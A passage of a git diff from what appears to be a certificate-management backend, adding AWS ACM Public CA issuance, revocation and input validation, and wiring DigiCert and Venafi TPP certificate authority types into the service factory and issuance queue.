extKeyUsageExt.usages + .map((oid) => CertExtendedKeyUsageOIDToName[oid as string]) + .filter(Boolean); + } + + // ACM picks the signature algorithm server-side β€” derive it from the issued cert + // so the persisted value matches what was actually signed. 
+ const sigAlgName = certObj.signatureAlgorithm.name; + const sigHashName = (certObj.signatureAlgorithm as unknown as { hash?: { name: string } }).hash?.name; + let issuedSignatureAlgorithm: CertSignatureAlgorithm; + if (sigAlgName === "RSASSA-PKCS1-v1_5" && sigHashName === "SHA-256") { + issuedSignatureAlgorithm = CertSignatureAlgorithm.RSA_SHA256; + } else if (sigAlgName === "RSASSA-PKCS1-v1_5" && sigHashName === "SHA-384") { + issuedSignatureAlgorithm = CertSignatureAlgorithm.RSA_SHA384; + } else if (sigAlgName === "RSASSA-PKCS1-v1_5" && sigHashName === "SHA-512") { + issuedSignatureAlgorithm = CertSignatureAlgorithm.RSA_SHA512; + } else if (sigAlgName === "ECDSA" && sigHashName === "SHA-256") { + issuedSignatureAlgorithm = CertSignatureAlgorithm.ECDSA_SHA256; + } else if (sigAlgName === "ECDSA" && sigHashName === "SHA-384") { + issuedSignatureAlgorithm = CertSignatureAlgorithm.ECDSA_SHA384; + } else if (sigAlgName === "ECDSA" && sigHashName === "SHA-512") { + issuedSignatureAlgorithm = CertSignatureAlgorithm.ECDSA_SHA512; + } else { + throw new BadRequestError({ + message: `Unsupported signature algorithm from AWS ACM: ${sigAlgName} with ${sigHashName}` + }); + } + + const externalMetadata = ExternalMetadataSchema.parse({ + type: CaType.AWS_ACM_PUBLIC_CA, + arn: certificateArn, + region: issuanceRegion, + validationMethod: AwsAcmValidationMethod.DNS + }); + + let newCertId: string; + await certificateDAL.transaction(async (tx) => { + const cert = await certificateDAL.create( + { + caId: ca.id, + profileId, + status: CertStatus.ACTIVE, + friendlyName: commonName, + commonName, + altNames: altNames.map((san) => san.value).join(","), + serialNumber: certObj.serialNumber, + notBefore: certObj.notBefore, + notAfter: certObj.notAfter, + keyAlgorithm, + signatureAlgorithm: issuedSignatureAlgorithm, + keyUsages: issuedKeyUsages, + extendedKeyUsages: issuedExtendedKeyUsages, + projectId: ca.projectId, + externalMetadata, + renewedFromCertificateId: isRenewal && 
originalCertificateId ? originalCertificateId : null, + ...parsedFields + }, + tx + ); + + newCertId = cert.id; + + if (isRenewal && originalCertificateId) { + await certificateDAL.updateById(originalCertificateId, { renewedByCertificateId: cert.id }, tx); + } + + await certificateBodyDAL.create( + { + certId: cert.id, + encryptedCertificate, + encryptedCertificateChain + }, + tx + ); + + await certificateSecretDAL.create( + { + certId: cert.id, + encryptedPrivateKey + }, + tx + ); + + if (profileId && certificateProfileDAL) { + const profile = await certificateProfileDAL.findByIdWithConfigs(profileId, tx); + if (profile?.apiConfig?.autoRenew && profile.apiConfig.renewBeforeDays) { + await certificateDAL.updateById(cert.id, { renewBeforeDays: profile.apiConfig.renewBeforeDays }, tx); + } + } + }); + + return { + certificate: certificatePem, + certificateChain: certificateChainPem, + privateKey: privateKeyPem, + serialNumber: certObj.serialNumber, + certificateId: newCertId!, + ca: acmCa + }; + }; + + const revokeCertificate = async ({ + caId, + serialNumber, + reason + }: { + caId: string; + serialNumber: string; + reason: CrlReason; + }) => { + const ca = await certificateAuthorityDAL.findByIdWithAssociatedCa(caId); + if (!ca.externalCa || ca.externalCa.type !== CaType.AWS_ACM_PUBLIC_CA) { + throw new BadRequestError({ message: "CA is not an AWS ACM Public Certificate Authority" }); + } + + const acmCa = castDbEntryToAwsAcmPublicCaCertificateAuthority(ca); + const { appConnectionId } = acmCa.configuration; + + // ACM revokes by ARN, not serial number. Look up the ARN from the cert's externalMetadata. 
+ const cert = await certificateDAL.findOne({ caId, serialNumber }); + if (!cert) { + throw new NotFoundError({ + message: `Certificate with serial number '${serialNumber}' not found under CA '${caId}'` + }); + } + + // If this certificate has been superseded by a renewal, the ARN now points at the renewed + // cert body in AWS β€” hitting AWS RevokeCertificate would revoke the actively-served cert. + // The superseded cert body is already gone from AWS, so skip the AWS call and let the caller + // mark the DB row as REVOKED on its own. + if (cert.renewedByCertificateId) { + logger.info( + `Skipping AWS ACM revoke for superseded certificate β€” ARN now points at renewed cert [certificateId=${cert.id}] [renewedByCertificateId=${cert.renewedByCertificateId}]` + ); + return; + } + + const parsedMetadata = ExternalMetadataSchema.safeParse(cert.externalMetadata); + if (!parsedMetadata.success || parsedMetadata.data.type !== CaType.AWS_ACM_PUBLIC_CA || !parsedMetadata.data.arn) { + throw new BadRequestError({ + message: `Certificate '${cert.id}' is missing AWS ACM metadata β€” cannot resolve ARN for revocation` + }); + } + + // ARNs are region-locked β€” use the cert's stored region, not the CA's current region. + const acmClient = await createAcmClient({ + appConnectionId, + region: parsedMetadata.data.region, + appConnectionDAL, + kmsService + }); + const revocationReason = CRL_REASON_TO_ACM_REVOCATION_REASON_MAP[reason]; + + let result; + try { + result = await acmClient.send( + new RevokeCertificateCommand({ + CertificateArn: parsedMetadata.data.arn, + RevocationReason: revocationReason + }) + ); + } catch (error) { + throw new BadRequestError({ + message: `Failed to revoke certificate via AWS Certificate Manager: ${error instanceof Error ? 
error.message : "Unknown error"}` + }); + } + logger.info(result, "AWS ACM RevokeCertificate result"); + }; + + return { + createCertificateAuthority, + updateCertificateAuthority, + listCertificateAuthorities, + orderCertificateFromProfile, + revokeCertificate + }; +}; + +// Re-export for existing callers (queue, v3 service, approval fns, etc.). +export { validateAcmIssuanceInputs }; diff --git a/backend/src/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-schemas.ts b/backend/src/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-schemas.ts new file mode 100644 index 00000000000..ebbb100c58c --- /dev/null +++ b/backend/src/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-schemas.ts @@ -0,0 +1,47 @@ +import { z } from "zod"; + +import { CertificateAuthorities } from "@app/lib/api-docs/constants"; +import { AWSRegion } from "@app/services/app-connection/app-connection-enums"; + +import { CaType } from "../certificate-authority-enums"; +import { + BaseCertificateAuthoritySchema, + GenericCreateCertificateAuthorityFieldsSchema, + GenericUpdateCertificateAuthorityFieldsSchema +} from "../certificate-authority-schemas"; + +export const AwsAcmPublicCaCertificateAuthorityConfigurationSchema = z.object({ + appConnectionId: z + .string() + .uuid() + .trim() + .describe(CertificateAuthorities.CONFIGURATIONS.AWS_ACM_PUBLIC_CA.appConnectionId), + dnsAppConnectionId: z + .string() + .uuid() + .trim() + .describe(CertificateAuthorities.CONFIGURATIONS.AWS_ACM_PUBLIC_CA.dnsAppConnectionId), + hostedZoneId: z + .string() + .trim() + .min(1, "Hosted Zone ID is required") + .describe(CertificateAuthorities.CONFIGURATIONS.AWS_ACM_PUBLIC_CA.hostedZoneId), + region: z.nativeEnum(AWSRegion).describe(CertificateAuthorities.CONFIGURATIONS.AWS_ACM_PUBLIC_CA.region) +}); + +export const AwsAcmPublicCaCertificateAuthoritySchema = BaseCertificateAuthoritySchema.extend({ + 
type: z.literal(CaType.AWS_ACM_PUBLIC_CA), + configuration: AwsAcmPublicCaCertificateAuthorityConfigurationSchema +}); + +export const CreateAwsAcmPublicCaCertificateAuthoritySchema = GenericCreateCertificateAuthorityFieldsSchema( + CaType.AWS_ACM_PUBLIC_CA +).extend({ + configuration: AwsAcmPublicCaCertificateAuthorityConfigurationSchema +}); + +export const UpdateAwsAcmPublicCaCertificateAuthoritySchema = GenericUpdateCertificateAuthorityFieldsSchema( + CaType.AWS_ACM_PUBLIC_CA +).extend({ + configuration: AwsAcmPublicCaCertificateAuthorityConfigurationSchema.optional() +}); diff --git a/backend/src/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-types.ts b/backend/src/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-types.ts new file mode 100644 index 00000000000..680d46e4b8a --- /dev/null +++ b/backend/src/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-types.ts @@ -0,0 +1,17 @@ +import { z } from "zod"; + +import { + AwsAcmPublicCaCertificateAuthoritySchema, + CreateAwsAcmPublicCaCertificateAuthoritySchema, + UpdateAwsAcmPublicCaCertificateAuthoritySchema +} from "./aws-acm-public-ca-certificate-authority-schemas"; + +export type TAwsAcmPublicCaCertificateAuthority = z.infer; + +export type TCreateAwsAcmPublicCaCertificateAuthorityDTO = z.infer< + typeof CreateAwsAcmPublicCaCertificateAuthoritySchema +>; + +export type TUpdateAwsAcmPublicCaCertificateAuthorityDTO = z.infer< + typeof UpdateAwsAcmPublicCaCertificateAuthoritySchema +>; diff --git a/backend/src/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-validators.ts b/backend/src/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-validators.ts new file mode 100644 index 00000000000..778202026e4 --- /dev/null +++ 
b/backend/src/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-validators.ts @@ -0,0 +1,128 @@ +import { customAlphabet } from "nanoid"; + +import { BadRequestError } from "@app/lib/errors"; +import { ms } from "@app/lib/ms"; +import { CertKeyAlgorithm, CertSubjectAlternativeNameType } from "@app/services/certificate/certificate-types"; + +import { AWS_ACM_CERTIFICATE_VALIDITY_DAYS } from "./aws-acm-public-ca-certificate-authority-enums"; + +export const ACM_ALLOWED_KEY_ALGORITHMS = new Set([ + CertKeyAlgorithm.RSA_2048, + CertKeyAlgorithm.ECDSA_P256, + CertKeyAlgorithm.ECDSA_P384 +]); + +export const ACM_FIXED_VALIDITY_MS = AWS_ACM_CERTIFICATE_VALIDITY_DAYS * 24 * 60 * 60 * 1000; + +/** + * Pre-flight validator for ACM issuance inputs. Called both by the async fns + * (defense in depth) and synchronously by the certificate order API before + * enqueuing, so the user gets a 400 on submit rather than a FAILED request + * row a moment later. + */ +export const validateAcmIssuanceInputs = ({ + csr, + keyAlgorithm, + altNames, + ttl, + notBefore, + notAfter, + organization, + organizationalUnit, + country, + state, + locality, + isRenewal +}: { + csr?: string; + keyAlgorithm?: string; + altNames?: Array<{ type: CertSubjectAlternativeNameType; value: string }>; + ttl?: string; + notBefore?: Date | string; + notAfter?: Date | string; + organization?: string; + organizationalUnit?: string; + country?: string; + state?: string; + locality?: string; + isRenewal?: boolean; +}) => { + if (csr) { + throw new BadRequestError({ + message: "AWS Certificate Manager does not support CSR-based issuance" + }); + } + if (keyAlgorithm && !ACM_ALLOWED_KEY_ALGORITHMS.has(keyAlgorithm)) { + throw new BadRequestError({ + message: `AWS ACM only supports RSA_2048, EC_prime256v1, and EC_secp384r1 key algorithms. 
Received: ${keyAlgorithm}` + }); + } + if (organization || organizationalUnit || country || state || locality) { + throw new BadRequestError({ + message: "AWS Certificate Manager does not support subject fields (O, OU, C, ST, L)" + }); + } + if (altNames) { + for (const san of altNames) { + if (san.type !== CertSubjectAlternativeNameType.DNS_NAME) { + throw new BadRequestError({ + message: `AWS Certificate Manager only supports DNS SANs. Unsupported SAN type: ${san.type}` + }); + } + } + } + // On renewal, ACM handles validity itself β€” we don't pass a TTL to AWS, and the + // TTL derived from the original cert may round down (e.g., 197.999d β†’ "197d"), + // so skip the exact-match check. + if (!isRenewal) { + if (!ttl) { + throw new BadRequestError({ + message: `AWS Certificate Manager issues certificates with a fixed validity of ${AWS_ACM_CERTIFICATE_VALIDITY_DAYS} days.` + }); + } + let ttlMs: number; + try { + ttlMs = ms(ttl); + } catch { + throw new BadRequestError({ + message: `Invalid TTL format: ${ttl}` + }); + } + if (ttlMs !== ACM_FIXED_VALIDITY_MS) { + throw new BadRequestError({ + message: `AWS Certificate Manager issues certificates with a fixed validity of ${AWS_ACM_CERTIFICATE_VALIDITY_DAYS} days.` + }); + } + if (notBefore || notAfter) { + throw new BadRequestError({ + message: `AWS Certificate Manager does not support notBefore or notAfter β€” validity is fixed at ${AWS_ACM_CERTIFICATE_VALIDITY_DAYS} days from issuance.` + }); + } + } +}; + +export const mapCertKeyAlgorithmToAcm = (keyAlgorithm: CertKeyAlgorithm) => { + switch (keyAlgorithm) { + case CertKeyAlgorithm.RSA_2048: + return "RSA_2048"; + case CertKeyAlgorithm.ECDSA_P256: + return "EC_prime256v1"; + case CertKeyAlgorithm.ECDSA_P384: + return "EC_secp384r1"; + default: + throw new BadRequestError({ + message: `AWS ACM only supports RSA_2048, EC_prime256v1, and EC_secp384r1 key algorithms. 
Received: ${keyAlgorithm as string}` + }); + } +}; + +// ACM's ExportCertificate passphrase must be 4-128 chars and cannot contain #, $, or %. +const generateAcmPassphraseInternal = customAlphabet( + "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789", + 32 +); +export const generateAcmPassphrase = (): string => generateAcmPassphraseInternal(); + +// Strip hyphens from the certificate UUID to produce a 32-char token that +// satisfies AWS's IdempotencyToken constraints (max 32 chars, alphanumeric). +export const buildIdempotencyToken = (certificateId: string) => certificateId.split("-").join("").slice(0, 32); diff --git a/backend/src/services/certificate-authority/certificate-authority-enums.ts b/backend/src/services/certificate-authority/certificate-authority-enums.ts index 7b56dc1bb0e..082017f1966 100644 --- a/backend/src/services/certificate-authority/certificate-authority-enums.ts +++ b/backend/src/services/certificate-authority/certificate-authority-enums.ts @@ -2,7 +2,10 @@ export enum CaType { INTERNAL = "internal", ACME = "acme", AZURE_AD_CS = "azure-ad-cs", - AWS_PCA = "aws-pca" + AWS_PCA = "aws-pca", + DIGICERT = "digicert", + AWS_ACM_PUBLIC_CA = "aws-acm-public-ca", + VENAFI_TPP = "venafi-tpp" } export enum InternalCaType { diff --git a/backend/src/services/certificate-authority/certificate-authority-maps.ts b/backend/src/services/certificate-authority/certificate-authority-maps.ts index 0fc093a1a3f..460a2d7080c 100644 --- a/backend/src/services/certificate-authority/certificate-authority-maps.ts +++ b/backend/src/services/certificate-authority/certificate-authority-maps.ts @@ -4,7 +4,10 @@ export const CERTIFICATE_AUTHORITIES_TYPE_MAP: Record = { [CaType.INTERNAL]: "Internal", [CaType.ACME]: "ACME-compatible CA", [CaType.AZURE_AD_CS]: "Active Directory Certificate Service", - [CaType.AWS_PCA]: "AWS Private Certificate Authority" + [CaType.AWS_PCA]: "AWS Private Certificate Authority", + [CaType.DIGICERT]: "DigiCert", + 
[CaType.AWS_ACM_PUBLIC_CA]: "AWS ACM Public CA", + [CaType.VENAFI_TPP]: "Venafi Trust Protection Platform" }; export const CERTIFICATE_AUTHORITIES_CAPABILITIES_MAP: Record = { @@ -19,7 +22,22 @@ export const CERTIFICATE_AUTHORITIES_CAPABILITIES_MAP: Record; @@ -77,7 +107,7 @@ type TCertificateAuthorityServiceFactoryDep = { internalCertificateAuthorityService: TInternalCertificateAuthorityServiceFactory; projectDAL: Pick; permissionService: Pick; - certificateDAL: Pick; + certificateDAL: Pick; certificateBodyDAL: Pick; certificateSecretDAL: Pick; kmsService: Pick< @@ -87,7 +117,13 @@ type TCertificateAuthorityServiceFactoryDep = { pkiSubscriberDAL: Pick; pkiSyncDAL: Pick; pkiSyncQueue: Pick; - certificateProfileDAL?: Pick; + certificateProfileDAL?: Pick; + certificateRequestDAL: Pick< + TCertificateRequestDALFactory, + "findById" | "updateById" | "updateStatus" | "attachCertificate" + >; + resourceMetadataDAL: Pick; + gatewayV2Service: Pick; }; export type TCertificateAuthorityServiceFactory = ReturnType; @@ -107,7 +143,10 @@ export const certificateAuthorityServiceFactory = ({ pkiSubscriberDAL, pkiSyncDAL, pkiSyncQueue, - certificateProfileDAL + certificateProfileDAL, + certificateRequestDAL, + resourceMetadataDAL, + gatewayV2Service }: TCertificateAuthorityServiceFactoryDep) => { const acmeFns = AcmeCertificateAuthorityFns({ appConnectionDAL, @@ -141,6 +180,20 @@ export const certificateAuthorityServiceFactory = ({ certificateProfileDAL }); + const venafiTppFns = VenafiTppCertificateAuthorityFns({ + appConnectionDAL, + appConnectionService, + certificateAuthorityDAL, + externalCertificateAuthorityDAL, + certificateDAL, + certificateBodyDAL, + certificateSecretDAL, + kmsService, + projectDAL, + certificateProfileDAL, + gatewayV2Service + }); + const awsPcaFns = AwsPcaCertificateAuthorityFns({ appConnectionDAL, appConnectionService, @@ -154,6 +207,30 @@ export const certificateAuthorityServiceFactory = ({ certificateProfileDAL }); + const digicertFns = 
DigiCertCertificateAuthorityFns({ + appConnectionDAL, + appConnectionService, + certificateAuthorityDAL, + externalCertificateAuthorityDAL, + certificateDAL, + certificateBodyDAL, + certificateSecretDAL, + kmsService, + projectDAL + }); + const awsAcmPublicCaFns = AwsAcmPublicCaCertificateAuthorityFns({ + appConnectionDAL, + appConnectionService, + certificateAuthorityDAL, + externalCertificateAuthorityDAL, + certificateDAL, + certificateBodyDAL, + certificateSecretDAL, + kmsService, + projectDAL, + certificateProfileDAL + }); + const createCertificateAuthority = async ( { type, projectId, name, configuration, status }: TCreateCertificateAuthorityDTO, actor: OrgServiceActor @@ -227,6 +304,34 @@ export const certificateAuthorityServiceFactory = ({ }); } + if (type === CaType.DIGICERT) { + return digicertFns.createCertificateAuthority({ + name, + projectId, + configuration: configuration as TCreateDigiCertCertificateAuthorityDTO["configuration"], + status, + actor + }); + } + if (type === CaType.AWS_ACM_PUBLIC_CA) { + return awsAcmPublicCaFns.createCertificateAuthority({ + name, + projectId, + configuration: configuration as TCreateAwsAcmPublicCaCertificateAuthorityDTO["configuration"], + status, + actor + }); + } + if (type === CaType.VENAFI_TPP) { + return venafiTppFns.createCertificateAuthority({ + name, + projectId, + configuration: configuration as TCreateVenafiTppCertificateAuthorityDTO["configuration"], + status, + actor + }); + } + throw new BadRequestError({ message: "Invalid certificate authority type" }); }; @@ -289,6 +394,18 @@ export const certificateAuthorityServiceFactory = ({ return castDbEntryToAwsPcaCertificateAuthority(certificateAuthority); } + if (type === CaType.DIGICERT) { + return castDbEntryToDigiCertCertificateAuthority(certificateAuthority); + } + + if (type === CaType.AWS_ACM_PUBLIC_CA) { + return castDbEntryToAwsAcmPublicCaCertificateAuthority(certificateAuthority); + } + + if (type === CaType.VENAFI_TPP) { + return 
castDbEntryToVenafiTppCertificateAuthority(certificateAuthority); + } + throw new BadRequestError({ message: "Invalid certificate authority type" }); }; @@ -356,6 +473,18 @@ export const certificateAuthorityServiceFactory = ({ return castDbEntryToAwsPcaCertificateAuthority(certificateAuthority); } + if (type === CaType.DIGICERT) { + return castDbEntryToDigiCertCertificateAuthority(certificateAuthority); + } + + if (type === CaType.AWS_ACM_PUBLIC_CA) { + return castDbEntryToAwsAcmPublicCaCertificateAuthority(certificateAuthority); + } + + if (type === CaType.VENAFI_TPP) { + return castDbEntryToVenafiTppCertificateAuthority(certificateAuthority); + } + throw new BadRequestError({ message: "Invalid certificate authority type" }); }; @@ -418,6 +547,18 @@ export const certificateAuthorityServiceFactory = ({ return awsPcaFns.listCertificateAuthorities({ projectId, permissionFilters }); } + if (type === CaType.DIGICERT) { + return digicertFns.listCertificateAuthorities({ projectId, permissionFilters }); + } + + if (type === CaType.AWS_ACM_PUBLIC_CA) { + return awsAcmPublicCaFns.listCertificateAuthorities({ projectId, permissionFilters }); + } + + if (type === CaType.VENAFI_TPP) { + return venafiTppFns.listCertificateAuthorities({ projectId, permissionFilters }); + } + throw new BadRequestError({ message: "Invalid certificate authority type" }); }; @@ -507,6 +648,36 @@ export const certificateAuthorityServiceFactory = ({ }); } + if (type === CaType.DIGICERT) { + return digicertFns.updateCertificateAuthority({ + id: certificateAuthority.id, + configuration: configuration as TUpdateDigiCertCertificateAuthorityDTO["configuration"], + actor, + status, + name + }); + } + + if (type === CaType.AWS_ACM_PUBLIC_CA) { + return awsAcmPublicCaFns.updateCertificateAuthority({ + id: certificateAuthority.id, + configuration: configuration as TUpdateAwsAcmPublicCaCertificateAuthorityDTO["configuration"], + actor, + status, + name + }); + } + + if (type === CaType.VENAFI_TPP) { + return 
venafiTppFns.updateCertificateAuthority({ + id: certificateAuthority.id, + configuration: configuration as TUpdateVenafiTppCertificateAuthorityDTO["configuration"], + actor, + status, + name + }); + } + throw new BadRequestError({ message: "Invalid certificate authority type" }); }; @@ -570,6 +741,18 @@ export const certificateAuthorityServiceFactory = ({ return castDbEntryToAwsPcaCertificateAuthority(certificateAuthority); } + if (type === CaType.DIGICERT) { + return castDbEntryToDigiCertCertificateAuthority(certificateAuthority); + } + + if (type === CaType.AWS_ACM_PUBLIC_CA) { + return castDbEntryToAwsAcmPublicCaCertificateAuthority(certificateAuthority); + } + + if (type === CaType.VENAFI_TPP) { + return castDbEntryToVenafiTppCertificateAuthority(certificateAuthority); + } + throw new BadRequestError({ message: "Invalid certificate authority type" }); }; @@ -662,6 +845,36 @@ export const certificateAuthorityServiceFactory = ({ }); } + if (type === CaType.DIGICERT) { + return digicertFns.updateCertificateAuthority({ + id: certificateAuthority.id, + configuration: configuration as TUpdateDigiCertCertificateAuthorityDTO["configuration"], + actor, + status, + name + }); + } + + if (type === CaType.AWS_ACM_PUBLIC_CA) { + return awsAcmPublicCaFns.updateCertificateAuthority({ + id: certificateAuthority.id, + configuration: configuration as TUpdateAwsAcmPublicCaCertificateAuthorityDTO["configuration"], + actor, + status, + name + }); + } + + if (type === CaType.VENAFI_TPP) { + return venafiTppFns.updateCertificateAuthority({ + id: certificateAuthority.id, + configuration: configuration as TUpdateVenafiTppCertificateAuthorityDTO["configuration"], + actor, + status, + name + }); + } + throw new BadRequestError({ message: "Invalid certificate authority type" }); }; @@ -731,6 +944,18 @@ export const certificateAuthorityServiceFactory = ({ return castDbEntryToAwsPcaCertificateAuthority(certificateAuthority); } + if (type === CaType.DIGICERT) { + return 
castDbEntryToDigiCertCertificateAuthority(certificateAuthority); + } + + if (type === CaType.AWS_ACM_PUBLIC_CA) { + return castDbEntryToAwsAcmPublicCaCertificateAuthority(certificateAuthority); + } + + if (type === CaType.VENAFI_TPP) { + return castDbEntryToVenafiTppCertificateAuthority(certificateAuthority); + } + throw new BadRequestError({ message: "Invalid certificate authority type" }); }; @@ -840,11 +1065,95 @@ export const certificateAuthorityServiceFactory = ({ return; } + if (caType === CaType.DIGICERT) { + await digicertFns.revokeCertificate({ caId, serialNumber, reason }); + return; + } + + if (caType === CaType.AWS_ACM_PUBLIC_CA) { + await awsAcmPublicCaFns.revokeCertificate({ caId, serialNumber, reason }); + return; + } + throw new BadRequestError({ message: `Certificate revocation via CA service is not supported for CA type "${caType}"` }); }; + const triggerCertificateRequestValidation = async ({ + actor, + actorId, + actorAuthMethod, + actorOrgId, + certificateRequestId + }: Omit & { certificateRequestId: string }) => { + const certificateRequest = await certificateRequestDAL.findById(certificateRequestId); + if (!certificateRequest) { + throw new NotFoundError({ message: "Certificate request not found" }); + } + + const { permission } = await permissionService.getProjectPermission({ + actor, + actorId, + projectId: certificateRequest.projectId, + actorAuthMethod, + actorOrgId, + actionProjectType: ActionProjectType.CertificateManager + }); + + const requestMetadata = (await resourceMetadataDAL.find({ certificateRequestId: certificateRequest.id })).map( + ({ key, value }) => ({ key, value: value || "" }) + ); + + ForbiddenError.from(permission).throwUnlessCan( + ProjectPermissionCertificateActions.Edit, + subject(ProjectPermissionSub.Certificates, { + commonName: certificateRequest.commonName ?? undefined, + altNames: Array.isArray(certificateRequest.altNames) + ? 
(certificateRequest.altNames as { type: string; value: string }[]).map((san) => san.value) + : undefined, + metadata: requestMetadata + }) + ); + + if (certificateRequest.status !== CertificateRequestStatus.PENDING_VALIDATION) { + throw new BadRequestError({ + message: `Certificate request is not pending validation [status=${certificateRequest.status}]` + }); + } + + if (!certificateRequest.caId) { + throw new BadRequestError({ message: "Certificate request is not linked to a certificate authority" }); + } + + const ca = await certificateAuthorityDAL.findByIdWithAssociatedCa(certificateRequest.caId); + if (ca.externalCa?.type !== CaType.DIGICERT) { + throw new BadRequestError({ + message: `Manual validation is only supported for DigiCert certificate authorities [caType=${ca.externalCa?.type}]` + }); + } + + const result = await processDigiCertPendingValidationRequest( + { + certificateAuthorityDAL, + appConnectionDAL, + kmsService, + certificateRequestDAL, + certificateRequestService: { + updateCertificateRequestStatus: async ({ certificateRequestId: id, status, errorMessage }) => + certificateRequestDAL.updateStatus(id, status, errorMessage), + attachCertificateToRequest: async ({ certificateRequestId: id, certificateId }) => + certificateRequestDAL.attachCertificate(id, certificateId) + }, + resourceMetadataDAL, + digicertFns + }, + certificateRequest + ); + + return { ...result, projectId: certificateRequest.projectId }; + }; + return { createCertificateAuthority, findCertificateAuthorityById, @@ -856,6 +1165,7 @@ export const certificateAuthorityServiceFactory = ({ getCaById, deprecatedUpdateCertificateAuthority, deprecatedDeleteCertificateAuthority, - revokeCertificate + revokeCertificate, + triggerCertificateRequestValidation }; }; diff --git a/backend/src/services/certificate-authority/certificate-authority-types.ts b/backend/src/services/certificate-authority/certificate-authority-types.ts index d3eb1257a97..1d6fc551c41 100644 --- 
a/backend/src/services/certificate-authority/certificate-authority-types.ts +++ b/backend/src/services/certificate-authority/certificate-authority-types.ts @@ -1,4 +1,8 @@ import { TAcmeCertificateAuthority, TAcmeCertificateAuthorityInput } from "./acme/acme-certificate-authority-types"; +import { + TAwsAcmPublicCaCertificateAuthority, + TCreateAwsAcmPublicCaCertificateAuthorityDTO +} from "./aws-acm-public-ca/aws-acm-public-ca-certificate-authority-types"; import { TAwsPcaCertificateAuthority, TCreateAwsPcaCertificateAuthorityDTO @@ -8,22 +12,36 @@ import { TCreateAzureAdCsCertificateAuthorityDTO } from "./azure-ad-cs/azure-ad-cs-certificate-authority-types"; import { CaType } from "./certificate-authority-enums"; +import { + TCreateDigiCertCertificateAuthorityDTO, + TDigiCertCertificateAuthority +} from "./digicert/digicert-certificate-authority-types"; import { TInternalCertificateAuthority, TInternalCertificateAuthorityInput } from "./internal/internal-certificate-authority-types"; +import { + TCreateVenafiTppCertificateAuthorityDTO, + TVenafiTppCertificateAuthority +} from "./venafi-tpp/venafi-tpp-certificate-authority-types"; export type TCertificateAuthority = | TInternalCertificateAuthority | TAcmeCertificateAuthority | TAzureAdCsCertificateAuthority - | TAwsPcaCertificateAuthority; + | TAwsPcaCertificateAuthority + | TDigiCertCertificateAuthority + | TAwsAcmPublicCaCertificateAuthority + | TVenafiTppCertificateAuthority; export type TCertificateAuthorityInput = | TInternalCertificateAuthorityInput | TAcmeCertificateAuthorityInput | TCreateAzureAdCsCertificateAuthorityDTO - | TCreateAwsPcaCertificateAuthorityDTO; + | TCreateAwsPcaCertificateAuthorityDTO + | TCreateDigiCertCertificateAuthorityDTO + | TCreateAwsAcmPublicCaCertificateAuthorityDTO + | TCreateVenafiTppCertificateAuthorityDTO; export type TCreateCertificateAuthorityDTO = Omit; diff --git a/backend/src/services/certificate-authority/certificate-issuance-queue.ts 
b/backend/src/services/certificate-authority/certificate-issuance-queue.ts index aae303ca7ce..0ea573d2be7 100644 --- a/backend/src/services/certificate-authority/certificate-issuance-queue.ts +++ b/backend/src/services/certificate-authority/certificate-issuance-queue.ts @@ -1,5 +1,7 @@ import acme from "acme-client"; +import { UnrecoverableError } from "bullmq"; +import { TGatewayV2ServiceFactory } from "@app/ee/services/gateway-v2/gateway-v2-service"; import { crypto } from "@app/lib/crypto/cryptography"; import { NotFoundError } from "@app/lib/errors"; import { logger } from "@app/lib/logger"; @@ -13,12 +15,15 @@ import { import { TCertificateProfileDALFactory } from "@app/services/certificate-profile/certificate-profile-dal"; import { TKmsServiceFactory } from "@app/services/kms/kms-service"; import { TProjectDALFactory } from "@app/services/project/project-dal"; +import { getProjectKmsCertificateKeyId } from "@app/services/project/project-fns"; import { TAppConnectionDALFactory } from "../app-connection/app-connection-dal"; import { TAppConnectionServiceFactory } from "../app-connection/app-connection-service"; import { TCertificateBodyDALFactory } from "../certificate/certificate-body-dal"; import { TCertificateSecretDALFactory } from "../certificate/certificate-secret-dal"; import { CertKeyAlgorithm } from "../certificate-common/certificate-constants"; +import { DigiCertExternalMetadataSchema } from "../certificate-common/external-metadata-schemas"; +import { TCertificateRequestDALFactory } from "../certificate-request/certificate-request-dal"; import { TCertificateRequestServiceFactory } from "../certificate-request/certificate-request-service"; import { CertificateRequestStatus } from "../certificate-request/certificate-request-types"; import { TPkiAlertV2QueueServiceFactory } from "../pki-alert-v2/pki-alert-v2-queue"; @@ -28,13 +33,24 @@ import { TPkiSyncDALFactory } from "../pki-sync/pki-sync-dal"; import { TPkiSyncQueueFactory } from 
"../pki-sync/pki-sync-queue"; import { TResourceMetadataDALFactory } from "../resource-metadata/resource-metadata-dal"; import { copyMetadataFromRequestToCertificate } from "../resource-metadata/resource-metadata-fns"; +import { + ACME_ORDER_TIMEOUT_MS, + AcmeOrderTimeoutError, + AcmeRateLimitError, + isAcmeRateLimitError, + runWithAcmeOrderTimeout +} from "./acme/acme-certificate-authority-errors"; import { AcmeCertificateAuthorityFns } from "./acme/acme-certificate-authority-fns"; +import { AcmPendingError } from "./aws-acm-public-ca/aws-acm-public-ca-certificate-authority-errors"; +import { AwsAcmPublicCaCertificateAuthorityFns } from "./aws-acm-public-ca/aws-acm-public-ca-certificate-authority-fns"; import { AwsPcaCertificateAuthorityFns } from "./aws-pca/aws-pca-certificate-authority-fns"; import { AzureAdCsCertificateAuthorityFns } from "./azure-ad-cs/azure-ad-cs-certificate-authority-fns"; import { TCertificateAuthorityDALFactory } from "./certificate-authority-dal"; import { CaType } from "./certificate-authority-enums"; import { keyAlgorithmToAlgCfg } from "./certificate-authority-fns"; +import { DigiCertCertificateAuthorityFns } from "./digicert/digicert-certificate-authority-fns"; import { TExternalCertificateAuthorityDALFactory } from "./external-certificate-authority-dal"; +import { VenafiTppCertificateAuthorityFns } from "./venafi-tpp/venafi-tpp-certificate-authority-fns"; const base64UrlToBase64 = (base64url: string): string => { let base64 = base64url.replace(/-/g, "+").replace(/_/g, "/"); @@ -69,6 +85,7 @@ 